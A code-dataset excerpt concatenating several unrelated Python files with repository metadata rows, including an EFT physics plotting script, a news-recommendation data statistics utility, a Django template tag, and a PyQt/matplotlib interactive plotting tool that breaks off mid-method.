ax0.bar(bins,nd_hist, width=bin_w, yerr=nd_err, ecolor='tab:blue', label='Custom', fill=False, edgecolor='tab:blue')
ax1.bar(bins,nd_hist/mc_hist, width=bin_w, yerr=nd_err/mc_hist, ecolor='tab:blue', label='nd/my_sample', fill=False, edgecolor='tab:blue')
ax0.legend()
ax0.set_yscale('log')
ax0.set_ylabel('% of Total')
ax1.set_ylabel('nd/my_sample')
ax1.set_ylim(.5,1.5)
plt.grid(True)
plt.xlim(0,500)
plt.show()
if __name__ == '__main__':
#main()
part = sys.argv[1]
#
pklDir = 'pkl_files/'
aux_file = pklDir+'aux_EFT.pkl'
#aux_file = pklDir+'aux_EFT_ken_tth.pkl'
file_dict = {'H': pklDir+'eventInfo_EFT_tth.pkl',
'Z': pklDir+'eventInfo_EFT_ttZ.pkl',
'K': pklDir+'eventInfo_EFT_ken_tth.pkl'}
#wgt_file = file_dict['K']
wgt_file = file_dict[part]
eft_wc = ( # all 16 considered WC
'ctW', 'ctp', 'cpQM', 'ctli', 'cQei', 'ctZ', 'cQlMi', 'cQl3i', 'ctG', 'ctlTi', 'cbW', 'cpQ3', 'ctei', 'cpt', 'ctlSi', 'cptb'
)
eft_hb_wc = ( # two heavy + boson Wilson Coefficients
'ctp', 'cpQM', 'cpQ3', 'cpt', 'cptb', 'ctW', 'ctZ', 'cbW', 'ctG'
)
eft_2l_wc = ( # two heavy + two lepton Wilson Coefficients
'cQl3i', 'ctli', 'cQei', 'cQlMi', 'ctlTi', 'ctei', 'ctlSi'
)
eft = EFT_DC_Prep(part, aux_file, wgt_file, eft_hb_wc)
#print(eft.wgt_df)
#print(eft['beta']['ctp'])
#print(eft['beta']['ctp_ctp'])
#print(eft['beta']['SM'])
#print(pd.DataFrame.from_dict({'ctZ':[1,-1], 'ctW': 0}))
eft.plot_all_eft_scale()
eft.plot_xsec_eft_scale()
#eft.plot_all_eft_scale(opt='q')
#eft.plot_all_eft_scale(opt='p')
#eft.create_dc_Df()
##
#mc_hist = get_root_hist('h_ttz.root')
#mc_hist = get_root_hist('h_tth.root')
#nd_hist, nd_bins, raw_c = eft.getMCshape()
###
#plot4Andrew(mc_hist,nd_hist,nd_bins,raw_c)
| [
"bcaraway@cern.ch"
] | bcaraway@cern.ch |
725c241a20c3a428a6b91bd6ee339be475bbca96 | 9f38512cc6c7ef83cd69c3f679c2f3a855799488 | /utility/dataAnalysis.py | 8f1467a54fb509f221fbe5795918937bbebe0448 | [] | no_license | tangzhenyu/drl_recommendation_system | 1254d17414b497ad0bfe60dcb183e96dab29284c | 8120a01d4f25f91af56b66ae1d21959d60f56331 | refs/heads/master | 2022-12-18T05:10:32.150344 | 2020-09-25T05:02:33 | 2020-09-25T05:02:33 | 293,391,672 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 7,188 | py | from utility.hype_parameters import HypeParameters as hypes
import argparse
import sys
from environment import environment_10_newsTags_tagShared_trueDQN as env
import os
def trainStrToDict(line):
result = dict()
if "".__eq__(line):
return result
tmp = line.strip().split("\t")
for v in tmp:
if "".__eq__(v):
continue
tmp = v.strip().split("#")
result[tmp[0]] = tmp[1]
return result
def userTags_statistic(userData_path):
userData_file = open(userData_path, 'r')
f = open("userTags.txt", 'w')
num_user = 0
max_num_userTags = 0
num_userTags_total = 0
while (True):
line = userData_file.readline().strip('\n').strip()
# pre_point = self.user_file.tell()
if not "".__eq__(line):
try:
elem = trainStrToDict(line)
uid = elem["uid"]
state = elem["state"]
feature = elem["feature"]
features = feature.split(" ")
instant_tag = []
short_tag = []
long_tag_old = []
long_tag_new = []
for t in features:
tag, tag_w, tag_type = t.split(":")
if tag_type == '1':
instant_tag.append(t)
elif tag_type == '2':
short_tag.append(t)
elif tag_type == '3':
long_tag_old.append(t)
elif tag_type == '5':
long_tag_new.append(t)
num_userTags = len(features)
max_num_userTags = max(max_num_userTags, num_userTags)
num_userTags_total += num_userTags
num_user += 1
norm=len(instant_tag)+len(short_tag)+len(long_tag_old)+len(long_tag_new)
print('processing ', num_user)
if (num_userTags >= 0):
f.write(str(num_user) + '\t' +
uid + '\t' + str(num_userTags) + '\t' +
str(len(instant_tag)/norm) + '\t' +
str(len(short_tag)/norm) + '\t' +
str(len(long_tag_old)/norm) + '\t' +
str(len(long_tag_new)/norm) + '\t' +
"\n")
except:
print('read data error: ', line)
else:
print("one epoch done")
break
print("max: ", max_num_userTags)
print("ave: ", num_userTags_total / num_user)
f.close()
def indexSeq_statistic(userEnv):
num_indexSeq_total = 0
max_num_indexSeq = -10
num_request_total = 0
max_num_request = -10
num_user = 0.
epoch = 0
uid_count = 0
count_indseq = 0
f = open("userIndexSeqs.txt", 'w')
while epoch < 1:
# t_read_s=time.time()
_ = userEnv.reset()
# t_read_e=time.time()-t_read_s
# print('read time:',t_read_e)
if userEnv.one_epoch_done:
epoch += 1
uid_count = 0
if len(userEnv.episode_record) == 0:
#print('the episode is not valid')
continue # number of valid data is 0
else:
uid_count += 1
print('epoch: ', epoch, '\tuid_count: ', uid_count,'\tlen:',len(userEnv.episode_record))
'''
while uid_count < 100:
state=userEnv.reset()
uid_count+=1
'''
uid = userEnv.episode_record[0].userID
num_request = len(userEnv.episode_record)
num_request_total += num_request
max_num_request = max(max_num_request, num_request)
for t in range(len(userEnv.episode_record)):
num_indexSeq = len(userEnv.episode_record[t].indexSeq)
max_num_indexSeq = max(max_num_indexSeq, num_indexSeq)
num_indexSeq_total += num_indexSeq
num_click=len(userEnv.episode_record[t].click_newsIDs)
log_time=userEnv.episode_record[t].log_time
f.write(uid + '\t' + str(t) + '\t' + str(num_indexSeq) +
'\t'+str(len(userEnv.episode_record))+
'\t'+str(num_click)+
'\t'+log_time+"\n")
count_indseq += 1
num_user += 1
print("max: ", max_num_indexSeq)
print("ave: ", num_indexSeq_total / count_indseq)
print("max: ", max_num_request)
print("ave: ", num_request_total / num_user)
f.close()
def showValidStates(userEnv, args):
# Initialize target network weights
# actor_Q.update_target_network()
epoch = 0
uid_count = 0
while epoch < 1:
# t_read_s=time.time()
state = userEnv.reset()
# t_read_e=time.time()-t_read_s
# print('read time:',t_read_e)
uid_count += 1
# print('epoch: ', epoch, '\tuid_count: ', uid_count)
if userEnv.one_epoch_done:
epoch += 1
uid_count = 0
if len(userEnv.episode_record) == 0:
# print('the episode is not valid')
continue # number of valid data is 0
# if(uid_count<=3):
# continue
'''
while uid_count < 100:
state=userEnv.reset()
uid_count+=1
'''
print('valid states: ', len(userEnv.episode_record))
episode_reward = 0
for t in range(len(userEnv.episode_record)):
# read action from user record
picked_newsIDs = userEnv.episode_record[t].recommend_newsIDs
valid = True
action = []
for id in picked_newsIDs:
if (id not in userEnv.episode_record[t].indexSeq):
valid = False
break
else:
a = userEnv.episode_record[t].indexSeq.index(id)
action.append(a)
if valid == False:
print('the episode is not valid,')
break
next_state, reward, done = userEnv.step(action, t)
episode_reward += pow(hypes.gamma, t) * reward
print('episode_reward: ', episode_reward)
def main(args):
newsTag_dict_path=args.data_news
user_records_path=args.data_user
data_path = env.DataPaths(newsTag_dict_path, user_records_path)
userEnv = env.Environment(data_path, max_newsTag_num=hypes.max_newsTag_num,
max_userTags_num=hypes.max_userTags_num,
max_candidates_num=hypes.max_candidates_num)
# showValidStates(userEnv,args)
#userTags_statistic(args.user_records_path)
indexSeq_statistic(userEnv)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--data_user', type=str,
help='',
default='D:download/data/2019-01-21_13-00/userOnehot')
parser.add_argument('--data_news', type=str,
help='',
default='D:download/data/2019-01-21_13-00/newsOnehot')
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| [
"tangzhenyu_2012@163.com"
] | tangzhenyu_2012@163.com |
51e143411179c72bfa7bbfbd9bd7d7bd04103a16 | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/model_test.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/quantize/python/common.py | 78f1c2bb4f48920369f7dab6876ead2faead3890 | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 185 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/contrib/quantize/python/common.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
1a71e0581d50bc3a92a7aa6af1f7fc8eafe2ba11 | c2a7d4b6a55c2c5c4aeae94819e5980bd76e0455 | /conversations/templatetags/users_on.py | 2f3b0bd59f7fcdcb49d890b8f6ce117ae000decb | [] | no_license | mnlx/portfolio_site | aecd4b501e3e61325175006eb3479f499f40ffa4 | e0511bf983af6dbf477cfba395df55a0484c9b08 | refs/heads/master | 2021-01-02T22:48:28.534922 | 2017-09-20T16:55:13 | 2017-09-20T16:55:13 | 99,397,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | from django import template
from django.shortcuts import render,HttpResponse,HttpResponseRedirect
from rango.models import User
register = template.Library()
import datetime
@register.inclusion_tag('conversations/templatetags/users_on.html')
def users_on():
# conv = Conversations.objects.get(pk=1)
friends = User.objects.all()[:5]
friends_name_list =[(x.first_name,x.last_name) for x in friends]
return {'online_friends' : friends_name_list}
@register.simple_tag
def current_time(format_string):
return datetime.datetime.now().strftime(format_string) | [
"andreduarte2010@gmail.com"
] | andreduarte2010@gmail.com |
8ddc4ab7c2bd85798985046714aa9e09e58a8dfc | 0d8a5beac8540ce21c32b8a03645355c008839f5 | /Quiz-4.py | a14f20b92c901d3fbae529eaaa823ffd3675f4aa | [] | no_license | sanketkothiya/Learn-Python | 5a4728d72a93fa8734521cd1aa8672874ef54cab | 8fe4a322c0cd451c26a31f20355c4d377e24c5e7 | refs/heads/master | 2022-12-24T11:07:21.324789 | 2020-10-01T15:30:05 | 2020-10-01T15:30:05 | 300,320,777 | 0 | 0 | null | 2020-10-01T15:04:59 | 2020-10-01T15:04:59 | null | UTF-8 | Python | false | false | 211 | py | i=0
while(True):
n1 = int(input("Enter your Number Here:\n"))
if(n1>100):
print("you entered a number greater than 100\n")
break
else:
print("try again!\n")
continue
| [
"jigardonga912@gmail.com"
] | jigardonga912@gmail.com |
39c76491e27e10c613686ad4acbd06e41aaf3375 | 24a1f9fd62f9c3ab0c14016c71518809f1e257ba | /django_postges_lookups_any/models.py | 913a805f81bb237fb1597fa6849187a1ed3b2626 | [
"MIT"
] | permissive | alexshin/django-postges-lookups-any | 2877ca9093d262e8f9569c71c7ee3274508c8371 | 4b58813d70b11ff7fe8084b04b2da3d1e8675708 | refs/heads/main | 2023-03-02T20:14:05.519980 | 2021-02-08T21:54:14 | 2021-02-08T21:54:14 | 337,203,035 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | import django_postges_lookups_any.lookups
| [
"alex.shinkevich@gmail.com"
] | alex.shinkevich@gmail.com |
e59a019df509667298df3c5a87fda18bc0f8e7d0 | 0c72645ec5082afe0141b06c36d569d4b68570d3 | /misc/python/plotinteract.py | 3be0824e966bc85dfdb79fab5551d8f66e573e27 | [] | no_license | wilywampa/vimconfig | 3b681309c229449741a7d2d38f309e92c633d046 | e436ce65348f053b7c580492f084431a5f23728b | refs/heads/master | 2021-04-19T00:21:09.509827 | 2018-08-13T04:57:08 | 2018-08-13T04:57:08 | 27,682,082 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 58,205 | py | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import ast
import collections
import copy
import logging
import matplotlib as mpl
import numpy as np
import re
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSignal
from collections import OrderedDict
from cycler import cycler
from itertools import chain, count, cycle, tee
from matplotlib.backend_bases import key_press_handler
from matplotlib.backends.backend_qt5agg import (FigureCanvasQTAgg as
FigureCanvas,
NavigationToolbar2QT
as NavigationToolbar)
from matplotlib.figure import Figure
from mplpicker import picker
from six import string_types, text_type
logger = logging.getLogger('plotinteract')
try:
QString = unicode
except NameError:
QString = str
PROPERTIES = ('color', 'linestyle', 'linewidth', 'alpha', 'marker',
'markersize', 'markerfacecolor', 'markevery', 'antialiased',
'dash_capstyle', 'dash_joinstyle', 'drawstyle', 'fillstyle',
'markeredgecolor', 'markeredgewidth', 'markerfacecoloralt',
'pickradius', 'solid_capstyle', 'solid_joinstyle')
ALIASES = dict(aa='antialiased', c='color', ec='edgecolor', fc='facecolor',
ls='linestyle', lw='linewidth', mew='markeredgewidth')
try:
import scipy.constants as const
except ImportError:
CONSTANTS = dict(r2d=np.rad2deg(1), d2r=np.deg2rad(1))
else:
CONSTANTS = {k: v for k, v in const.__dict__.items()
if isinstance(v, float)}
CONSTANTS.update(dict(d2r=const.degree,
nmi=const.nautical_mile,
r2d=1.0 / const.degree,
psf=const.pound_force / (const.foot ** 2)))
if sys.platform == 'darwin':
CONTROL_MODIFIER = QtCore.Qt.MetaModifier
else:
CONTROL_MODIFIER = QtCore.Qt.ControlModifier
IDENTIFIER_RE = re.compile('^[A-Za-z_][A-Za-z0-9_]*$')
KEYWORDS_RE = re.compile(r'\b[a-zA-Z_]\w*(?:\.[a-zA-Z_]\w*)*\.?')
EvalResult = collections.namedtuple('EvalResult', 'value ok warnings')
def flatten(d, ndim=None, prefix=''):
"""Join nested keys with '.' and unstack arrays."""
if ndim is None:
ndim = next(iter(sorted(
len(v.shape) for v in d.values() if hasattr(v, 'dtype'))), None)
out = {}
for key, value in d.items():
key = (prefix + '.' if prefix else '') + key
if isinstance(value, collections.Mapping):
out.update(flatten(value, ndim=ndim, prefix=key))
else:
out[key] = value
if hasattr(value, 'dtype') and len(value.shape) > ndim:
queue = [key]
while queue:
key = queue.pop()
array = out.pop(key)
new = {key + '[%d]' % i: a for i, a in enumerate(array)}
out.update(new)
queue.extend(q for q in new if len(new[q].shape) > ndim)
return out
def isiterable(obj):
"""Check if an object is iterable (but not a string)."""
if isinstance(obj, string_types):
return False
return hasattr(obj, '__iter__')
def unique(seq):
seen = set()
for item in seq:
if item not in seen:
seen.add(item)
yield item
def nth_color_value(c):
prop_cycler = mpl.rcParams['axes.prop_cycle']
colors = prop_cycler.by_key().get('color', ['k'])
return colors[int(c[1]) % len(colors)]
def props_repr(value):
if isinstance(value, text_type) and not isinstance(value, str):
value = str(value)
return repr(value)
def process_props_format(props):
props = dict(zip(('linestyle', 'marker', 'color'),
mpl.axes._base._process_plot_format(props)))
for key, value in list(props.items()):
if value is None or value == 'None':
del props[key]
return props
def dict_repr(d, top=True):
if isinstance(d, dict):
return ('{}' if top else 'dict({})').format(', '.join(
['{}={}'.format(k, dict_repr(v, False)) for k, v in d.items()]))
elif isinstance(d, string_types):
return repr(str(d))
return repr(d)
class KeyHandlerMixin(object):
axisEqual = pyqtSignal()
closed = pyqtSignal()
duplicate = pyqtSignal()
editProps = pyqtSignal()
editCdata = pyqtSignal()
relabel = pyqtSignal()
remove = pyqtSignal()
returnPressed = pyqtSignal()
sync = pyqtSignal()
syncAxis = pyqtSignal()
tabPressed = pyqtSignal(int)
twin = pyqtSignal()
xlim = pyqtSignal()
ylim = pyqtSignal()
def __init__(self, *args, **kwargs):
self.parent = kwargs['parent']
super(KeyHandlerMixin, self).__init__(*args, **kwargs)
self._lineEdit = self.lineEdit() if hasattr(self, 'lineEdit') else self
def select_all(self, event):
return self._lineEdit.selectAll()
def quit(self, event):
self.closed.emit()
self.window().close()
while not isinstance(self, Interact):
try:
self = self.parent
except AttributeError:
return
self._close()
def move_cursor(self, event):
if event.key() == QtCore.Qt.Key_Home:
if event.modifiers() == QtCore.Qt.ShiftModifier:
self._lineEdit.cursorBackward(True, len(self._lineEdit.text()))
else:
self._lineEdit.setCursorPosition(0)
elif event.key() == QtCore.Qt.Key_End:
if event.modifiers() == QtCore.Qt.ShiftModifier:
self._lineEdit.cursorForward(True, len(self._lineEdit.text()))
else:
self._lineEdit.setCursorPosition(len(self._lineEdit.text()))
else:
return False
return True
def delete_word(self, event):
if self._lineEdit.selectionStart() == -1:
self._lineEdit.cursorWordBackward(True)
self._lineEdit.backspace()
def event(self, event):
control_actions = {
QtCore.Qt.Key_A: self.select_all,
QtCore.Qt.Key_D: 'remove',
QtCore.Qt.Key_E: 'axisEqual',
QtCore.Qt.Key_L: 'relabel',
QtCore.Qt.Key_N: 'duplicate',
QtCore.Qt.Key_P: 'editProps',
QtCore.Qt.Key_Q: self.quit,
QtCore.Qt.Key_S: 'sync',
QtCore.Qt.Key_T: 'twin',
QtCore.Qt.Key_W: self.delete_word,
QtCore.Qt.Key_X: 'xlim',
QtCore.Qt.Key_Y: 'ylim',
QtCore.Qt.Key_Return: 'sync',
}
if event.type() == QtCore.QEvent.KeyPress:
logger.debug('KeyPress %s', next(
(k for k, v in QtCore.Qt.__dict__.items() if v == event.key()),
None))
if (event.modifiers() == CONTROL_MODIFIER and
event.key() in control_actions):
action = control_actions[event.key()]
try:
action(event)
except TypeError:
getattr(self, action).emit()
return True
elif (event.modifiers() ==
CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
event.key() == QtCore.Qt.Key_C):
self.editCdata.emit()
elif (event.modifiers() ==
CONTROL_MODIFIER | QtCore.Qt.ShiftModifier and
event.key() == QtCore.Qt.Key_S):
self.syncAxis.emit()
elif event.key() in (QtCore.Qt.Key_Home,
QtCore.Qt.Key_End):
return self.move_cursor(event)
elif event.key() == QtCore.Qt.Key_Return:
self.returnPressed.emit()
elif self.completer.popup().viewport().isVisible():
if event.key() == QtCore.Qt.Key_Tab:
self.tabPressed.emit(1)
return True
elif event.key() == QtCore.Qt.Key_Backtab:
self.tabPressed.emit(-1)
return True
return super(KeyHandlerMixin, self).event(event)
class KeyHandlerLineEdit(KeyHandlerMixin, QtWidgets.QLineEdit):
pass
class TabCompleter(QtWidgets.QCompleter):
def __init__(self, words, *args, **kwargs):
QtWidgets.QCompleter.__init__(self, words, *args, **kwargs)
self.setMaxVisibleItems(50)
self.words = words
self.skip = False
self.skip_text = None
self.popup().activated.connect(self.confirm)
def set_textbox(self, textbox):
self.textbox = textbox
self.textbox.tabPressed.connect(self.select_completion)
self.textbox.closed.connect(self.close_popup)
self.textbox.returnPressed.connect(self.confirm)
def select_completion(self, direction):
if not self.popup().selectionModel().hasSelection():
if direction == 0:
return
direction = 0
self.setCurrentRow((self.currentRow() + direction) %
self.completionCount())
self.popup().setCurrentIndex(
self.completionModel().index(self.currentRow(), 0))
def close_popup(self):
popup = self.popup()
if popup.isVisible():
self.confirm()
popup.close()
def confirm(self):
logger.debug('TabCompleter confirm')
try:
text = text_type(self.textbox.currentText())
except AttributeError:
if self.skip_text is not None:
self.skip = True
self.activated.emit(self.skip_text)
else:
self.activated.emit(text)
class CustomQCompleter(TabCompleter):
def __init__(self, parent, *args, **kwargs):
super(CustomQCompleter, self).__init__(parent, *args, **kwargs)
self.parent = parent
self.local_completion_prefix = ''
self.source_model = None
self.filterProxyModel = QtCore.QSortFilterProxyModel(self)
self.usingOriginalModel = False
try:
self.sortkey = parent.parent.sortkey
except AttributeError:
self.sortkey = str.lower
def setModel(self, model):
self.source_model = model
self.filterProxyModel = QtCore.QSortFilterProxyModel(self)
self.filterProxyModel.setSourceModel(self.source_model)
super(CustomQCompleter, self).setModel(self.filterProxyModel)
self.usingOriginalModel = True
def updateModel(self):
if not self.usingOriginalModel:
self.filterProxyModel.setSourceModel(self.source_model)
pattern = QtCore.QRegExp(
self.local_completion_prefix,
QtCore.Qt.CaseSensitive if re.search(
'[A-Z]', self.local_completion_prefix)
else QtCore.Qt.CaseInsensitive,
QtCore.QRegExp.RegExp)
self.filterProxyModel.setFilterRegExp(pattern)
def splitPath(self, path):
words = [text_type(QtCore.QRegExp.escape(word.replace(r'\ ', ' ')))
for word in re.split(r'(?<!\\)\s+', text_type(path))]
includes = [re.sub(r'^\\\\!', '!', word) for word in words
if not word.startswith('!')]
excludes = [word[1:] for word in words
if len(word) > 1 and word.startswith('!')]
self.local_completion_prefix = QString(
'^' + ''.join('(?=.*%s)' % word for word in includes) +
''.join('(?!.*%s)' % word for word in excludes) + '.+')
self.updateModel()
if self.completionCount() == 0:
self.local_completion_prefix = path
if self.filterProxyModel.rowCount() == 0:
logger.debug('rowCount == 0')
completions = set()
model = self.source_model
if model:
# Find keys that complete any partial key in path
keys = [model.data(model.index(i, 0))
for i in range(model.rowCount())]
for m in KEYWORDS_RE.finditer(path):
word = m[0]
logger.debug('word = %s', m[0])
if word in keys:
continue
for key in keys:
if key.lower().startswith(word.lower()):
c = path[:m.start()] + key + path[m.end():]
while '.' in c and len(c) >= len(word):
completions.add(c)
c = c.rpartition('.')[0]
if len(c) >= len(word):
completions.add(c)
logger.debug('completions = %r', completions)
self.usingOriginalModel = False
completions = sorted(completions, key=self.sortkey)
self.filterProxyModel.setSourceModel(
QtCore.QStringListModel(completions))
self.filterProxyModel.setFilterRegExp(QtCore.QRegExp('.*'))
return []
return []
class AutoCompleteComboBox(QtWidgets.QComboBox):
def __init__(self, *args, **kwargs):
super(AutoCompleteComboBox, self).__init__(*args, **kwargs)
self.setEditable(True)
self.setInsertPolicy(self.NoInsert)
self.completer = CustomQCompleter(self)
self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
self.setCompleter(self.completer)
def setModel(self, strList):
self.clear()
self.insertItems(0, strList)
self.completer.setModel(self.model())
class KeyHandlerComboBox(KeyHandlerMixin, AutoCompleteComboBox):
pass
class PropertyEditor(QtWidgets.QTableWidget):
def __init__(self, parent, *args, **kwargs):
super(PropertyEditor, self).__init__(*args, **kwargs)
self.setFixedSize(300, 400)
self.setSizePolicy(QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
self.setColumnCount(2)
self.setHorizontalHeaderLabels(['property', 'value'])
self.parent = parent
self.dataobj = None
self.setRowCount(len(PROPERTIES))
self.setCurrentCell(0, 1)
self.horizontalHeader().setSectionResizeMode(
QtWidgets.QHeaderView.Stretch)
self.horizontalHeader().setStretchLastSection(True)
self.move(0, 0)
def closeEvent(self, event):
self.parent.draw(keeplims=True)
def hideEvent(self, event):
self.parent.draw(keeplims=True)
def confirm(self, draw=True):
cell = self.currentRow(), self.currentColumn()
self.setCurrentItem(None)
self.setCurrentCell(*cell)
if draw:
self.parent.draw(keeplims=True)
def cycle_editors(self, direction):
self.confirm(draw=False)
try:
index = (self.parent.datas.index(
self.dataobj) + direction) % len(self.parent.datas)
except ValueError:
index = 0
self.parent.datas[index].edit_props()
control_actions = {
QtCore.Qt.Key_J: lambda self: self.focusNextPrevChild(True),
QtCore.Qt.Key_K: lambda self: self.focusNextPrevChild(False),
QtCore.Qt.Key_L: lambda self: self.confirm(),
QtCore.Qt.Key_N: lambda self: self.cycle_editors(1),
QtCore.Qt.Key_P: lambda self: self.cycle_editors(-1),
QtCore.Qt.Key_Q: lambda self: self.close(),
QtCore.Qt.Key_W: lambda self: self.close(),
}
def event(self, event):
if (event.type() == QtCore.QEvent.KeyPress and
event.modifiers() == CONTROL_MODIFIER and
event.key() in self.control_actions):
self.control_actions[event.key()](self)
return True
elif (event.type() == QtCore.QEvent.KeyPress and
self.state() == self.NoState and
event.key() in (QtCore.Qt.Key_Delete,
QtCore.Qt.Key_Backspace)):
self.setItem(self.currentRow(),
self.currentColumn(),
QtWidgets.QTableWidgetItem(''))
return True
elif (event.type() == QtCore.QEvent.ShortcutOverride and
self.state() == self.EditingState and
event.key() in (QtCore.Qt.Key_Down, QtCore.Qt.Key_Up)):
self.focusNextPrevChild(event.key() == QtCore.Qt.Key_Down)
self.focusNextPrevChild(event.key() != QtCore.Qt.Key_Down)
return True
try:
return super(PropertyEditor, self).event(event)
except TypeError:
return False
class ComboBoxDialog(QtWidgets.QInputDialog):
@staticmethod
def getComboBoxItem(parent, title, label, items,
text='', editable=True, flags=0, hints=0):
dialog = QtWidgets.QInputDialog(
parent, QtCore.Qt.WindowFlags(flags))
dialog.setWindowTitle(title)
dialog.setLabelText(label)
dialog.setComboBoxItems(items)
dialog.setComboBoxEditable(editable)
dialog.setInputMethodHints(QtCore.Qt.InputMethodHints(hints))
dialog.setTextValue(text)
if dialog.exec_() == QtWidgets.QDialog.Accepted:
return dialog.textValue(), True
return text, False
class DataObj(object):
def __init__(self, parent, obj, name, **kwargs):
self.parent = parent
self.name = name
self.widgets = []
self.twin = False
self.props = kwargs.get('props', {})
self.process_props()
if hasattr(obj, 'dtype'):
obj = {n: obj[n] for n in obj.dtype.names}
self.obj = flatten(obj, ndim=self.guess_ndim(obj, kwargs))
self.label = QtWidgets.QLabel('', parent=self.parent)
self._labels = getattr(obj, 'labels', kwargs.get('labels', None))
self.choose_label()
self.cache = collections.OrderedDict()
draw = self.parent.draw
self.scale_label = QtWidgets.QLabel('scale:', parent=self.parent)
self.xscale_label = QtWidgets.QLabel('scale:', parent=self.parent)
self.words = [k for k in self.obj if hasattr(self.obj[k], 'dtype')]
self.words.sort(key=parent.sortkey)
def new_text_box():
menu = KeyHandlerComboBox(parent=self.parent)
menu.setModel(self.words)
menu.setSizePolicy(QtWidgets.QSizePolicy(
QtWidgets.QSizePolicy.MinimumExpanding,
QtWidgets.QSizePolicy.Fixed))
menu.setMaxVisibleItems(50)
completer = menu.completer
completer.set_textbox(menu)
menu.activated.connect(draw)
completer.activated.connect(draw)
return completer, menu
self.completer, self.menu = new_text_box()
self.xcompleter, self.xmenu = new_text_box()
self.xmenu.setModel(self.words + ['_'])
self.menu.setCurrentIndex(0)
self.xmenu.setCurrentIndex(0)
self.xlabel = QtWidgets.QLabel('x axis:', parent=self.parent)
words = sorted(CONSTANTS, key=str.lower)
def new_scale_box():
scale_compl = TabCompleter(words, parent=self.parent)
scale_box = KeyHandlerLineEdit(parent=self.parent)
scale_box.completer = scale_compl
scale_box.setFixedWidth(100)
scale_compl.setWidget(scale_box)
scale_box.setText('1.0')
scale_compl.set_textbox(scale_box)
def text_edited(text):
scale_compl.skip_text = None
if scale_compl.skip:
scale_compl.skip = False
return
cursor_pos = scale_box.cursorPosition()
text = text_type(scale_box.text())[:cursor_pos]
prefix = re.split(r'\W', text)[-1].strip()
scale_compl.setCompletionPrefix(prefix)
scale_compl.complete()
scale_compl.select_completion(0)
def complete_text(text):
if not scale_box.text():
return scale_box.setText(u'1.0')
text = text_type(text)
cursor_pos = scale_box.cursorPosition()
before_text = text_type(scale_box.text())[:cursor_pos]
after_text = text_type(scale_box.text())[cursor_pos:]
prefix_len = len(re.split(r'\W', before_text)[-1].strip())
part = before_text[-prefix_len:] if prefix_len else ''
if not part and scale_compl.skip_text:
part = scale_compl.skip_text[0]
if part and text.startswith(part):
scale_box.setText(before_text[:cursor_pos - prefix_len] +
text + after_text)
scale_box.setCursorPosition(cursor_pos -
prefix_len + len(text))
def highlight(text):
scale_compl.skip_text = text
scale_box.returnPressed.connect(draw)
scale_box.textEdited.connect(text_edited)
scale_compl.activated.connect(complete_text)
scale_compl.highlighted.connect(highlight)
return scale_box, scale_compl
self.scale_box, self.scale_compl = new_scale_box()
self.xscale_box, self.xscale_compl = new_scale_box()
self.kwargs = kwargs
self.process_kwargs()
self.process_cdata()
def choose_label(self):
names = [d.name for d in self.parent.datas if d is not self]
if self.name in names:
labels = [text_type(d.label.text()).rstrip(':')
for d in self.parent.datas if d is not self]
i = -1
label = self.name
while label in labels:
i += 1
label = '{} ({})'.format(self.name, i)
else:
label = self.name
self.label.setText(label + ':')
if self._labels is None:
self.labels = getattr(self.obj, 'labels', label)
else:
self.labels = self._labels
def guess_ndim(self, obj, kwargs):
if isinstance(kwargs.get('ndim', None), int):
return kwargs['ndim']
for key in 'yname', 'xname':
try:
return np.ndim(obj[kwargs[key]])
except KeyError:
pass
try:
return min(len(v.shape) for v in obj.values()
if hasattr(v, 'dtype'))
except ValueError:
return None
def eval_key(self, text):
if text in self.obj:
return EvalResult(value=self.obj[text], ok=True, warnings=[])
elif text == '_':
return EvalResult(value=None, ok=False, warnings=[])
cache_key = text
cache = self.cache
try:
return cache[cache_key]
except KeyError:
pass
keys = set(self.obj)
replace = {}
for key, value in self.obj.items():
if IDENTIFIER_RE.match(key) or key not in text:
continue
pattern = re.compile(r'\b' + re.escape(key) +
r'(\b|(?=[^A-Za-z0-9_])|$)')
var = '__' + str(next(i for i in count()
if '__' + str(i) not in keys))
keys.add(var)
text = pattern.sub('(' + var + ')', text)
replace[var] = value
logger.debug('eval_key after text = %s', text)
try:
result = EvalResult(
value=eval(text, {'np': np, 'numpy': np}, collections.ChainMap(
replace, self.obj, CONSTANTS, np.__dict__)),
ok=True, warnings=[])
if np.isscalar(result.value):
raise ValueError('scalar result')
except Exception as e:
warning = 'Error evaluating key: ' + text_type(e)
try:
return EvalResult(value=self.obj[text_type(
self.menu.itemText(self.menu.currentIndex()))],
ok=False, warnings=[warning])
except Exception:
return EvalResult(value=None, ok=False, warnings=[warning])
cache[cache_key] = result
while len(cache) > 100:
cache.popitem(last=False)
return result
@property
def cdata(self):
if isinstance(self._cdata, str):
if not self._cdata:
return None
value, ok, _ = self.eval_key(self._cdata)
if not ok:
logger.warning('invalid cdata key: %r', self._cdata)
self._cdata = None
return
return value
return self._cdata
@cdata.setter
def cdata(self, value):
logger.debug('cdata.setter %r', value)
self._cdata = value
def set_name(self, menu, name):
